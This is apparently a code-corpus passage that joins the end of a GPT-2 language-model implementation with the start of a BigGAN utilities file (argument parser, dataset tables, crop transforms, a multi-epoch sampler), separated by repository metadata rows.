                hidden_states, layer_past=layer_past, attention_mask=attention_mask, head_mask=head_mask[i]
            )

            hidden_states, present = outputs[:2]
            if self.output_past:
                presents = presents + (present,)

            if self.output_attentions:
                all_attentions.append(outputs[2])

        hidden_states = self.ln_f(hidden_states)

        hidden_states = hidden_states.view(*output_shape)
        # Add last hidden state
        if self.output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)

        outputs = (hidden_states,)
        if self.output_past:
            outputs = outputs + (presents,)
        if self.output_hidden_states:
            outputs = outputs + (all_hidden_states,)
        if self.output_attentions:
            # let the number of heads free (-1) so we can extract attention even after head pruning
            attention_output_shape = input_shape[:-1] + (-1,) + all_attentions[0].shape[-2:]
            all_attentions = tuple(t.view(*attention_output_shape) for t in all_attentions)
            outputs = outputs + (all_attentions,)
        return outputs  # last hidden state, (presents), (all hidden_states), (attentions)
@add_start_docstrings(
    """The GPT2 Model transformer with a language modeling head on top
    (linear layer with weights tied to the input embeddings). """,
    GPT2_START_DOCSTRING,
    GPT2_INPUTS_DOCSTRING,
)
class GPT2LMHeadModel(GPT2PreTrainedModel):
    r"""
        **labels**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, sequence_length)``:
            Labels for language modeling.
            Note that the labels **are shifted** inside the model, i.e. you can set ``lm_labels = input_ids``
            Indices are selected in ``[-100, 0, ..., config.vocab_size]``
            All labels set to ``-100`` are ignored (masked), the loss is only
            computed for labels in ``[0, ..., config.vocab_size]``

    Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
        **loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
            Language modeling loss.
        **prediction_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length, config.vocab_size)``
            Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
        **past**:
            list of ``torch.FloatTensor`` (one for each layer) of shape ``(2, batch_size, num_heads, sequence_length, embed_size_per_head)``:
            that contains pre-computed hidden-states (key and values in the attention blocks).
            Can be used (see `past` input) to speed up sequential decoding. The token ids which have their past given to this model
            should not be passed as input ids as they have already been computed.
        **hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
            list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
            of shape ``(batch_size, sequence_length, hidden_size)``:
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        **attentions**: (`optional`, returned when ``config.output_attentions=True``)
            list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.

    Examples::

        import torch
        from transformers import GPT2Tokenizer, GPT2LMHeadModel

        tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
        model = GPT2LMHeadModel.from_pretrained('gpt2')

        input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0)  # Batch size 1
        outputs = model(input_ids, labels=input_ids)
        loss, logits = outputs[:2]

    """

    def __init__(self, config):
        super().__init__(config)
        self.transformer = GPT2Model(config)
        # lm_head shares weights with the input embeddings (tied via
        # get_output_embeddings / the base class's tying machinery).
        self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False)

        self.init_weights()

    def get_output_embeddings(self):
        """Return the LM head so the base class can tie it to the input embeddings."""
        return self.lm_head

    def prepare_inputs_for_generation(self, input_ids, **kwargs):
        # only last token for inputs_ids if past is defined in kwargs:
        # cached positions must not be re-fed to the model.
        if "past" in kwargs and kwargs["past"]:
            input_ids = input_ids[:, -1].unsqueeze(-1)

        inputs = {"input_ids": input_ids}
        inputs.update(kwargs)
        return inputs

    def forward(
        self,
        input_ids=None,
        past=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
    ):
        transformer_outputs = self.transformer(
            input_ids,
            past=past,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
        )
        hidden_states = transformer_outputs[0]

        lm_logits = self.lm_head(hidden_states)

        outputs = (lm_logits,) + transformer_outputs[1:]
        if labels is not None:
            # Shift so that tokens < n predict n
            shift_logits = lm_logits[..., :-1, :].contiguous()
            shift_labels = labels[..., 1:].contiguous()
            # Flatten the tokens (CrossEntropyLoss ignores -100 labels by default)
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
            outputs = (loss,) + outputs

        return outputs  # (loss), lm_logits, presents, (all hidden_states), (attentions)
@add_start_docstrings(
    """The GPT2 Model transformer with a language modeling and a multiple-choice classification
    head on top e.g. for RocStories/SWAG tasks. The two heads are two linear layers.
    The language modeling head has its weights tied to the input embeddings,
    the classification head takes as input the input of a specified classification token index in the input sequence).
""",
    GPT2_START_DOCSTRING,
    GPT2_INPUTS_DOCSTRING,
)
class GPT2DoubleHeadsModel(GPT2PreTrainedModel):
    r"""
        **mc_token_ids**: (`optional`, default to index of the last token of the input) ``torch.LongTensor`` of shape ``(batch_size, num_choices)``:
            Index of the classification token in each input sequence.
            Selected in the range ``[0, input_ids.size(-1) - 1[``.
        **lm_labels**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, sequence_length)``:
            Labels for language modeling.
            Note that the labels **are shifted** inside the model, i.e. you can set ``lm_labels = input_ids``
            Indices are selected in ``[-100, 0, ..., config.vocab_size]``
            All labels set to ``-100`` are ignored (masked), the loss is only
            computed for labels in ``[0, ..., config.vocab_size]``
        **mc_labels**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size)``:
            Labels for computing the multiple choice classification loss.
            Indices should be in ``[0, ..., num_choices]`` where `num_choices` is the size of the second dimension
            of the input tensors. (see `input_ids` above)

    Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
        **lm_loss**: (`optional`, returned when ``lm_labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
            Language modeling loss.
        **mc_loss**: (`optional`, returned when ``multiple_choice_labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
            Multiple choice classification loss.
        **lm_prediction_scores**: ``torch.FloatTensor`` of shape ``(batch_size, num_choices, sequence_length, config.vocab_size)``
            Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
        **mc_prediction_scores**: ``torch.FloatTensor`` of shape ``(batch_size, num_choices)``
            Prediction scores of the multiplechoice classification head (scores for each choice before SoftMax).
        **past**:
            list of ``torch.FloatTensor`` (one for each layer) of shape ``(2, batch_size, num_heads, sequence_length, embed_size_per_head)``:
            that contains pre-computed hidden-states (key and values in the attention blocks).
            Can be used (see `past` input) to speed up sequential decoding. The token ids which have their past given to this model
            should not be passed as input ids as they have already been computed.
        **hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
            list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
            of shape ``(batch_size, sequence_length, hidden_size)``:
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        **attentions**: (`optional`, returned when ``config.output_attentions=True``)
            list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.

    Examples::

        import torch
        from transformers import GPT2Tokenizer, GPT2DoubleHeadsModel

        tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
        model = GPT2DoubleHeadsModel.from_pretrained('gpt2')

        # Add a [CLS] to the vocabulary (we should train it also!)
        tokenizer.add_special_tokens({'cls_token': '[CLS]'})
        model.resize_token_embeddings(len(tokenizer))  # Update the model embeddings with the new vocabulary size
        print(tokenizer.cls_token_id, len(tokenizer))  # The newly token the last token of the vocabulary

        choices = ["Hello, my dog is cute [CLS]", "Hello, my cat is cute [CLS]"]
        encoded_choices = [tokenizer.encode(s) for s in choices]
        cls_token_location = [tokens.index(tokenizer.cls_token_id) for tokens in encoded_choices]

        input_ids = torch.tensor(encoded_choices).unsqueeze(0)  # Batch size: 1, number of choices: 2
        mc_token_ids = torch.tensor([cls_token_location])  # Batch size: 1

        outputs = model(input_ids, mc_token_ids=mc_token_ids)
        lm_prediction_scores, mc_prediction_scores = outputs[:2]

    """

    def __init__(self, config):
        super().__init__(config)
        # num_labels=1 makes SequenceSummary emit a single score per choice.
        config.num_labels = 1
        self.transformer = GPT2Model(config)
        self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False)  # (n_embd, vocab_size)
        self.multiple_choice_head = SequenceSummary(config)

        self.init_weights()

    def get_output_embeddings(self):
        """Return the LM head so the base class can tie it to the input embeddings."""
        return self.lm_head

    def forward(
        self,
        input_ids=None,
        past=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        mc_token_ids=None,
        lm_labels=None,
        mc_labels=None,
    ):
        transformer_outputs = self.transformer(
            input_ids,
            past=past,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
        )

        hidden_states = transformer_outputs[0]

        lm_logits = self.lm_head(hidden_states)  # Language Model Head
        # Multiple-choice head pools the hidden state at each mc_token_id.
        mc_logits = self.multiple_choice_head(hidden_states, mc_token_ids).squeeze(-1)  # Multiple Classification Head

        outputs = (lm_logits, mc_logits) + transformer_outputs[1:]
        if mc_labels is not None:
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(mc_logits.view(-1, mc_logits.size(-1)), mc_labels.view(-1))
            outputs = (loss,) + outputs
        if lm_labels is not None:
            # Shift so that tokens < n predict n
            shift_logits = lm_logits[..., :-1, :].contiguous()
            shift_labels = lm_labels[..., 1:].contiguous()
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
            outputs = (loss,) + outputs

        return outputs  # (lm loss), (mc loss), lm logits, mc logits, presents, (all hidden_states), (attentions)
| 46.826975
| 148
| 0.646999
|
794b2b4b5a82e5248f00f203dddc1d80fd4b8f1a
| 52,504
|
py
|
Python
|
utils.py
|
liuqk3/BigGAN-PyTorch
|
9b4491f5d68f34a1fe55bc0e8171fa3d3ad7bb08
|
[
"MIT"
] | null | null | null |
utils.py
|
liuqk3/BigGAN-PyTorch
|
9b4491f5d68f34a1fe55bc0e8171fa3d3ad7bb08
|
[
"MIT"
] | null | null | null |
utils.py
|
liuqk3/BigGAN-PyTorch
|
9b4491f5d68f34a1fe55bc0e8171fa3d3ad7bb08
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
''' Utilities file
This file contains utility functions for bookkeeping, logging, and data loading.
Methods which directly affect training should either go in layers, the model,
or train_fns.py.
'''
from __future__ import print_function
import sys
import os
import numpy as np
import time
import datetime
import json
import pickle
from argparse import ArgumentParser
import animal_hash
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
import datasets as dset
def prepare_parser():
    """Build the ArgumentParser shared by the training scripts.

    Groups: dataset/dataloader, model architecture, weight init, optimizer,
    batch/parallel/precision, bookkeeping, EMA, numerical eps / singular
    values, orthogonal regularization, train-fn selection, resuming, logging.

    NOTE(review): many defaults carry a trailing ``#TODO<old>`` comment —
    those are the upstream BigGAN defaults that this copy overrode; confirm
    intent before changing either value.

    Returns:
        argparse.ArgumentParser: parser with all training options registered.
    """
    usage = 'Parser for all scripts.'
    parser = ArgumentParser(description=usage)

    ### Dataset/Dataloader stuff ###
    parser.add_argument(
        '--dataset', type=str, default='I128_hdf5',
        help='Which Dataset to train on, out of I128, I256, C10, C100;'
        'Append "_hdf5" to use the hdf5 version for ISLVRC '
        '(default: %(default)s)')
    parser.add_argument(
        '--augment', action='store_true', default=False,
        help='Augment with random crops and flips (default: %(default)s)')
    parser.add_argument(
        '--num_workers', type=int, default=8,
        help='Number of dataloader workers; consider using less for HDF5 '
        '(default: %(default)s)')
    parser.add_argument(
        '--no_pin_memory', action='store_false', dest='pin_memory', default=True,
        help='Pin data into memory through dataloader? (default: %(default)s)')
    parser.add_argument(
        '--shuffle', action='store_true', default=True,#TODOFalse,
        help='Shuffle the data (strongly recommended)? (default: %(default)s)')
    parser.add_argument(
        '--load_in_mem', action='store_true', default=False,
        help='Load all data into memory? (default: %(default)s)')
    parser.add_argument(
        '--use_multiepoch_sampler', action='store_true', default=True,#TODOFalse,
        help='Use the multi-epoch sampler for dataloader? (default: %(default)s)')

    ### Model stuff ###
    parser.add_argument(
        '--model', type=str, default='BigGAN',
        help='Name of the model module (default: %(default)s)')
    parser.add_argument(
        '--G_param', type=str, default='SN',
        help='Parameterization style to use for G, spectral norm (SN) or SVD (SVD)'
        ' or None (default: %(default)s)')
    parser.add_argument(
        '--D_param', type=str, default='SN',
        help='Parameterization style to use for D, spectral norm (SN) or SVD (SVD)'
        ' or None (default: %(default)s)')
    parser.add_argument(
        '--G_ch', type=int, default=96, #TODO 64,
        help='Channel multiplier for G (default: %(default)s)')
    parser.add_argument(
        '--D_ch', type=int, default=96, #TODO64,
        help='Channel multiplier for D (default: %(default)s)')
    parser.add_argument(
        '--G_depth', type=int, default=1,
        help='Number of resblocks per stage in G? (default: %(default)s)')
    parser.add_argument(
        '--D_depth', type=int, default=1,
        help='Number of resblocks per stage in D? (default: %(default)s)')
    parser.add_argument(
        '--D_thin', action='store_false', dest='D_wide', default=True,
        help='Use the SN-GAN channel pattern for D? (default: %(default)s)')
    parser.add_argument(
        '--G_shared', action='store_true', default=True,#TODOFalse,
        help='Use shared embeddings in G? (default: %(default)s)')
    parser.add_argument(
        '--shared_dim', type=int, default=128,#TODO0,
        help='G''s shared embedding dimensionality; if 0, will be equal to dim_z. '
        '(default: %(default)s)')
    parser.add_argument(
        '--dim_z', type=int, default=120,#TODO128,
        help='Noise dimensionality: %(default)s)')
    parser.add_argument(
        '--z_var', type=float, default=1.0,
        help='Noise variance: %(default)s)')
    parser.add_argument(
        '--hier', action='store_true', default=True,#TODOFalse,
        help='Use hierarchical z in G? (default: %(default)s)')
    parser.add_argument(
        '--cross_replica', action='store_true', default=False,
        help='Cross_replica batchnorm in G?(default: %(default)s)')
    parser.add_argument(
        '--mybn', action='store_true', default=False,
        help='Use my batchnorm (which supports standing stats?) %(default)s)')
    parser.add_argument(
        '--G_nl', type=str, default='inplace_relu',#TODO'relu',
        help='Activation function for G (default: %(default)s)')
    parser.add_argument(
        '--D_nl', type=str, default='inplace_relu',#TODO'relu',
        help='Activation function for D (default: %(default)s)')
    parser.add_argument(
        '--G_attn', type=str, default='64',
        help='What resolutions to use attention on for G (underscore separated) '
        '(default: %(default)s)')
    parser.add_argument(
        '--D_attn', type=str, default='64',
        help='What resolutions to use attention on for D (underscore separated) '
        '(default: %(default)s)')
    parser.add_argument(
        '--norm_style', type=str, default='bn',
        help='Normalizer style for G, one of bn [batchnorm], in [instancenorm], '
        'ln [layernorm], gn [groupnorm] (default: %(default)s)')

    ### Model init stuff ###
    parser.add_argument(
        '--seed', type=int, default=0,
        help='Random seed to use; affects both initialization and '
        ' dataloading. (default: %(default)s)')
    parser.add_argument(
        '--G_init', type=str, default='ortho',
        help='Init style to use for G (default: %(default)s)')
    parser.add_argument(
        '--D_init', type=str, default='ortho',
        help='Init style to use for D(default: %(default)s)')
    parser.add_argument(
        '--skip_init', action='store_true', default=True,#TODOFalse,
        help='Skip initialization, ideal for testing when ortho init was used '
        '(default: %(default)s)')

    ### Optimizer stuff ###
    parser.add_argument(
        '--G_lr', type=float, default=1e-4,#TODO5e-5,
        help='Learning rate to use for Generator (default: %(default)s)')
    parser.add_argument(
        '--D_lr', type=float, default=4e-4,#TODO2e-4,
        help='Learning rate to use for Discriminator (default: %(default)s)')
    parser.add_argument(
        '--G_B1', type=float, default=0.0,
        help='Beta1 to use for Generator (default: %(default)s)')
    parser.add_argument(
        '--D_B1', type=float, default=0.0,
        help='Beta1 to use for Discriminator (default: %(default)s)')
    parser.add_argument(
        '--G_B2', type=float, default=0.999,
        help='Beta2 to use for Generator (default: %(default)s)')
    parser.add_argument(
        '--D_B2', type=float, default=0.999,
        help='Beta2 to use for Discriminator (default: %(default)s)')

    ### Batch size, parallel, and precision stuff ###
    parser.add_argument(
        '--batch_size', type=int, default=256,#TODO64,
        help='Default overall batchsize (default: %(default)s)')
    parser.add_argument(
        '--G_batch_size', type=int, default=512,#TODO0,
        help='Batch size to use for G; if 0, same as D (default: %(default)s)')
    parser.add_argument(
        '--num_G_accumulations', type=int, default=8,#TODO1,
        help='Number of passes to accumulate G''s gradients over '
        '(default: %(default)s)')
    parser.add_argument(
        '--num_D_steps', type=int, default=1,#TODO2,
        help='Number of D steps per G step (default: %(default)s)')
    parser.add_argument(
        '--num_D_accumulations', type=int, default=8,#TODO1,
        help='Number of passes to accumulate D''s gradients over '
        '(default: %(default)s)')
    parser.add_argument(
        '--split_D', action='store_true', default=False,
        help='Run D twice rather than concatenating inputs? (default: %(default)s)')
    parser.add_argument(
        '--num_epochs', type=int, default=100,
        help='Number of epochs to train for (default: %(default)s)')
    parser.add_argument(
        '--parallel', action='store_true', default=True, #TODOFalse,
        help='Train with multiple GPUs (default: %(default)s)')
    parser.add_argument(
        '--G_fp16', action='store_true', default=False,
        help='Train with half-precision in G? (default: %(default)s)')
    parser.add_argument(
        '--D_fp16', action='store_true', default=False,
        help='Train with half-precision in D? (default: %(default)s)')
    parser.add_argument(
        '--D_mixed_precision', action='store_true', default=False,
        help='Train with half-precision activations but fp32 params in D? '
        '(default: %(default)s)')
    parser.add_argument(
        '--G_mixed_precision', action='store_true', default=False,
        help='Train with half-precision activations but fp32 params in G? '
        '(default: %(default)s)')
    parser.add_argument(
        '--accumulate_stats', action='store_true', default=False,
        help='Accumulate "standing" batchnorm stats? (default: %(default)s)')
    parser.add_argument(
        '--num_standing_accumulations', type=int, default=16,
        help='Number of forward passes to use in accumulating standing stats? '
        '(default: %(default)s)')

    ### Bookkeping stuff ###
    parser.add_argument(
        '--G_eval_mode', action='store_true', default=True,#TODOFalse,
        help='Run G in eval mode (running/standing stats?) at sample/test time? '
        '(default: %(default)s)')
    parser.add_argument(
        '--save_every', type=int, default=1000,#TODO2000,
        help='Save every X iterations (default: %(default)s)')
    parser.add_argument(
        '--num_save_copies', type=int, default=2,
        help='How many copies to save (default: %(default)s)')
    parser.add_argument(
        '--num_best_copies', type=int, default=5,#TODO2,
        help='How many previous best checkpoints to save (default: %(default)s)')
    parser.add_argument(
        '--which_best', type=str, default='IS',
        help='Which metric to use to determine when to save new "best"'
        'checkpoints, one of IS or FID (default: %(default)s)')
    parser.add_argument(
        '--no_fid', action='store_true', default=False,
        help='Calculate IS only, not FID? (default: %(default)s)')
    parser.add_argument(
        '--test_every', type=int, default=2000,#TODO5000,
        help='Test every X iterations (default: %(default)s)')
    parser.add_argument(
        '--num_inception_images', type=int, default=50000,
        help='Number of samples to compute inception metrics with '
        '(default: %(default)s)')
    parser.add_argument(
        '--hashname', action='store_true', default=False,
        help='Use a hash of the experiment name instead of the full config '
        '(default: %(default)s)')
    parser.add_argument(
        '--base_root', type=str, default='',
        help='Default location to store all weights, samples, data, and logs '
        ' (default: %(default)s)')
    parser.add_argument(
        '--data_root', type=str, default='data',
        help='Default location where data is stored (default: %(default)s)')
    parser.add_argument(
        '--weights_root', type=str, default='weights',
        help='Default location to store weights (default: %(default)s)')
    parser.add_argument(
        '--logs_root', type=str, default='logs',
        help='Default location to store logs (default: %(default)s)')
    parser.add_argument(
        '--samples_root', type=str, default='samples',
        help='Default location to store samples (default: %(default)s)')
    parser.add_argument(
        '--pbar', type=str, default='mine',
        help='Type of progressbar to use; one of "mine" or "tqdm" '
        '(default: %(default)s)')
    parser.add_argument(
        '--name_suffix', type=str, default='',
        help='Suffix for experiment name for loading weights for sampling '
        '(consider "best0") (default: %(default)s)')
    parser.add_argument(
        '--experiment_name', type=str, default='',
        help='Optionally override the automatic experiment naming with this arg. '
        '(default: %(default)s)')
    parser.add_argument(
        '--config_from_name', action='store_true', default=False,
        help='Use a hash of the experiment name instead of the full config '
        '(default: %(default)s)')

    ### EMA Stuff ###
    parser.add_argument(
        '--ema', action='store_true', default=True,#TODOFalse,
        help='Keep an ema of G''s weights? (default: %(default)s)')
    parser.add_argument(
        '--ema_decay', type=float, default=0.9999,
        help='EMA decay rate (default: %(default)s)')
    parser.add_argument(
        '--use_ema', action='store_true', default=True,#TODOFalse,
        help='Use the EMA parameters of G for evaluation? (default: %(default)s)')
    parser.add_argument(
        '--ema_start', type=int, default=20000,#TODO0,
        help='When to start updating the EMA weights (default: %(default)s)')

    ### Numerical precision and SV stuff ###
    parser.add_argument(
        '--adam_eps', type=float, default=1e-6,#TODO1e-8,
        help='epsilon value to use for Adam (default: %(default)s)')
    parser.add_argument(
        '--BN_eps', type=float, default=1e-5,
        help='epsilon value to use for BatchNorm (default: %(default)s)')
    parser.add_argument(
        '--SN_eps', type=float, default=1e-6,#TODO1e-8,
        help='epsilon value to use for Spectral Norm(default: %(default)s)')
    parser.add_argument(
        '--num_G_SVs', type=int, default=1,
        help='Number of SVs to track in G (default: %(default)s)')
    parser.add_argument(
        '--num_D_SVs', type=int, default=1,
        help='Number of SVs to track in D (default: %(default)s)')
    parser.add_argument(
        '--num_G_SV_itrs', type=int, default=1,
        help='Number of SV itrs in G (default: %(default)s)')
    parser.add_argument(
        '--num_D_SV_itrs', type=int, default=1,
        help='Number of SV itrs in D (default: %(default)s)')

    ### Ortho reg stuff ###
    parser.add_argument(
        '--G_ortho', type=float, default=0.0, # 1e-4 is default for BigGAN
        help='Modified ortho reg coefficient in G(default: %(default)s)')
    parser.add_argument(
        '--D_ortho', type=float, default=0.0,
        help='Modified ortho reg coefficient in D (default: %(default)s)')
    parser.add_argument(
        '--toggle_grads', action='store_true', default=True,
        help='Toggle D and G''s "requires_grad" settings when not training them? '
        ' (default: %(default)s)')

    ### Which train function ###
    parser.add_argument(
        '--which_train_fn', type=str, default='GAN',
        help='How2trainyourbois (default: %(default)s)')

    ### Resume training stuff
    parser.add_argument(
        '--load_weights', type=str, default='',
        help='Suffix for which weights to load (e.g. best0, copy0) '
        '(default: %(default)s)')
    parser.add_argument(
        '--resume', action='store_true', default=False,
        help='Resume training? (default: %(default)s)')

    ### Log stuff ###
    parser.add_argument(
        '--logstyle', type=str, default='%3.3e',
        help='What style to use when logging training metrics?'
        'One of: %#.#f/ %#.#e (float/exp, text),'
        'pickle (python pickle),'
        'npz (numpy zip),'
        'mat (MATLAB .mat file) (default: %(default)s)')
    parser.add_argument(
        '--log_G_spectra', action='store_true', default=False,
        help='Log the top 3 singular values in each SN layer in G? '
        '(default: %(default)s)')
    parser.add_argument(
        '--log_D_spectra', action='store_true', default=False,
        help='Log the top 3 singular values in each SN layer in D? '
        '(default: %(default)s)')
    parser.add_argument(
        '--sv_log_interval', type=int, default=10,
        help='Iteration interval for logging singular values '
        ' (default: %(default)s)')
    return parser
# Arguments for sample.py; not presently used in train.py
def add_sample_parser(parser):
    """Register the sampling-only options (used by sample.py, not train.py).

    NOTE(review): trailing ``#TODO<old>`` comments mark upstream defaults
    this copy overrode; confirm before changing.

    Args:
        parser (argparse.ArgumentParser): parser to extend in place.
    Returns:
        argparse.ArgumentParser: the same parser, for chaining.
    """
    parser.add_argument(
        '--sample_npz', action='store_true', default=True,#TODOFalse,
        help='Sample "sample_num_npz" images and save to npz? '
        '(default: %(default)s)')
    parser.add_argument(
        '--sample_num_npz', type=int, default=50000,
        help='Number of images to sample when sampling NPZs '
        '(default: %(default)s)')
    parser.add_argument(
        '--sample_sheets', action='store_true', default=True,#TODOFalse,
        help='Produce class-conditional sample sheets and stick them in '
        'the samples root? (default: %(default)s)')
    parser.add_argument(
        '--sample_interps', action='store_true', default=True,#TODOFalse,
        help='Produce interpolation sheets and stick them in '
        'the samples root? (default: %(default)s)')
    parser.add_argument(
        '--sample_sheet_folder_num', type=int, default=-1,
        help='Number to use for the folder for these sample sheets '
        '(default: %(default)s)')
    parser.add_argument(
        '--sample_random', action='store_true', default=True,#TODOFalse,
        help='Produce a single random sheet? (default: %(default)s)')
    parser.add_argument(
        '--sample_trunc_curves', type=str, default='0.05_0.05_1.0',#TODO'',
        help='Get inception metrics with a range of variances?'
        'To use this, specify a startpoint, step, and endpoint, e.g. '
        '--sample_trunc_curves 0.2_0.1_1.0 for a startpoint of 0.2, '
        'endpoint of 1.0, and stepsize of 1.0. Note that this is '
        'not exactly identical to using tf.truncated_normal, but should '
        'have approximately the same effect. (default: %(default)s)')
    parser.add_argument(
        '--sample_inception_metrics', action='store_true', default=True,#TODOFalse,
        help='Calculate Inception metrics with sample.py? (default: %(default)s)')
    return parser
def make_sure_dir(file_or_path, str_type='dir'):
    """Ensure a directory exists, creating it (and any parents) if needed.

    Args:
        file_or_path: path to a directory, or to a file when
            ``str_type == 'file'`` (then the file's parent directory is
            the one created).
        str_type: 'dir' (default) or 'file'.
    """
    if str_type == 'file':
        file_or_path = os.path.dirname(os.path.abspath(file_or_path))
    # exist_ok avoids the check-then-create race of the original
    # `if not exists: makedirs` when several processes start concurrently.
    os.makedirs(file_or_path, exist_ok=True)
def save_config_to_json(config, filename):
    '''
    Save the dictionary config to a json file at the given path.
    Args:
        config: dict, to be saved
        filename: str, the path to save; must end with '.json'
    '''
    # Typo fixes vs. original: 'dictyionary'/'fiven' in the docstring and
    # 'josn' in the assertion message.
    assert filename.endswith('.json'), 'the filename for the saving of config should end with .json'
    make_sure_dir(filename, str_type='file')
    # Values json can't encode (modules, functions, ...) are stringified.
    config_ = {}
    for k in config:
        if isinstance(config[k], (str, list, int, float, bool)):
            config_[k] = config[k]
        else:
            config_[k] = str(config[k])
    with open(filename, 'w') as f:
        json.dump(config_, f, indent=4)
    print('Config file saved to {}'.format(filename))
# Convenience dicts
# Map dataset shorthand names to Dataset classes; the '_hdf5' variants read
# a preprocessed HDF5 archive instead of a raw image folder.
dset_dict = {'I32': dset.ImageFolder, 'I64': dset.ImageFolder,
             'I128': dset.ImageFolder, 'I256': dset.ImageFolder,
             'I32_hdf5': dset.ILSVRC_HDF5, 'I64_hdf5': dset.ILSVRC_HDF5,
             'I128_hdf5': dset.ILSVRC_HDF5, 'I256_hdf5': dset.ILSVRC_HDF5,
             'C10': dset.CIFAR10, 'C100': dset.CIFAR100}
# Image resolution (pixels, square) per dataset.
imsize_dict = {'I32': 32, 'I32_hdf5': 32,
               'I64': 64, 'I64_hdf5': 64,
               'I128': 128, 'I128_hdf5': 128,
               'I256': 256, 'I256_hdf5': 256,
               'C10': 32, 'C100': 32}
# Subdirectory (or HDF5 filename) under data_root for each dataset.
root_dict = {'I32': 'ImageNet', 'I32_hdf5': 'ILSVRC32.hdf5',
             'I64': 'ImageNet', 'I64_hdf5': 'ILSVRC64.hdf5',
             'I128': 'ImageNet', 'I128_hdf5': 'ILSVRC128.hdf5',
             'I256': 'ImageNet', 'I256_hdf5': 'ILSVRC256.hdf5',
             'C10': 'cifar', 'C100': 'cifar'}
# Number of classes per dataset.
nclass_dict = {'I32': 1000, 'I32_hdf5': 1000,
               'I64': 1000, 'I64_hdf5': 1000,
               'I128': 1000, 'I128_hdf5': 1000,
               'I256': 1000, 'I256_hdf5': 1000,
               'C10': 10, 'C100': 100}
# Number of classes to put per sample sheet
classes_per_sheet_dict = {'I32': 50, 'I32_hdf5': 50,
                          'I64': 50, 'I64_hdf5': 50,
                          'I128': 20, 'I128_hdf5': 20,
                          'I256': 20, 'I256_hdf5': 20,
                          'C10': 10, 'C100': 100}
# Nonlinearities selectable via --G_nl / --D_nl.
activation_dict = {'inplace_relu': nn.ReLU(inplace=True),
                   'relu': nn.ReLU(inplace=False),
                   'ir': nn.ReLU(inplace=True),}
class CenterCropLongEdge(object):
    """Center-crop a PIL Image to a square sized by its short edge.

    The crop size is derived from the image itself (min of width/height),
    so the transform takes no constructor arguments.
    """

    def __call__(self, img):
        """
        Args:
            img (PIL Image): Image to be cropped.
        Returns:
            PIL Image: Cropped image.
        """
        side = min(img.size)
        return transforms.functional.center_crop(img, side)

    def __repr__(self):
        return type(self).__name__
class RandomCropLongEdge(object):
    """Crop a PIL Image to a short-edge-sized square at a random position.

    Only the long edge gets a random start offset; the offset along the
    short edge is always 0.
    """

    def __call__(self, img):
        """
        Args:
            img (PIL Image): Image to be cropped.
        Returns:
            PIL Image: Cropped image.
        """
        side = min(img.size)
        # One offset per axis; random only where the image exceeds `side`.
        # (Draw order matches the original: axis 0 first, then axis 1.)
        offsets = []
        for axis in (0, 1):
            if side == img.size[axis]:
                offsets.append(0)
            else:
                offsets.append(np.random.randint(low=0, high=img.size[axis] - side))
        return transforms.functional.crop(img, offsets[0], offsets[1], side, side)

    def __repr__(self):
        return type(self).__name__
# multi-epoch Dataset sampler to avoid memory leakage and enable resumption of
# training from the same sample regardless of if we stop mid-epoch
class MultiEpochSampler(torch.utils.data.Sampler):
    r"""Randomly samples elements over multiple epochs as one index stream.

    Avoids dataloader teardown between epochs and lets training resume from
    the same sample mid-epoch.

    Arguments:
        data_source (Dataset): dataset to sample from
        num_epochs (int) : Number of times to loop over the dataset
        start_itr (int) : which iteration to begin from
        batch_size (int) : batch size, used to convert iterations to samples
    """

    def __init__(self, data_source, num_epochs, start_itr=0, batch_size=128):
        self.data_source = data_source
        self.num_samples = len(self.data_source)
        self.num_epochs = num_epochs
        self.start_itr = start_itr
        self.batch_size = batch_size
        if not isinstance(self.num_samples, int) or self.num_samples <= 0:
            raise ValueError("num_samples should be a positive integeral "
                             "value, but got num_samples={}".format(self.num_samples))

    def __iter__(self):
        n = len(self.data_source)
        # Samples already consumed by the first start_itr iterations.
        consumed = self.start_itr * self.batch_size
